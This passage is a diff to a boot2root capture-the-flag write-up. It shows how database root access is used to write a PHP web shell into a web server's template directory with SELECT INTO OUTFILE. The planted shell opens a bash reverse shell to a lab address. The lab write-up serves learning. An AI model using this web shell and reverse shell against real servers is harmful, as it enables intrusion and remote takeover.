moulin-louis/boot2root/writeup1.md

 We use the the previous password to access the database with a root access.

-Thanks to this root access, inserting some php file is now easy.
+Thanks to this database root access, inserting some php file is now easy.
 Lets create a `temp` database and run this querry on it:

     SQL>SELECT "<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.1/4243 0>&1'"); ?>" into outfile "/var/www/forum/templates_c/reverse.php"